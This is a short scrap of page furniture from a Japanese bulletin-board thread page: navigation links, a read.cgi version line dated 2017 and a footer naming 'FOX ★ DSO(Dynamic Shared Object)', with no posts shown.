★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)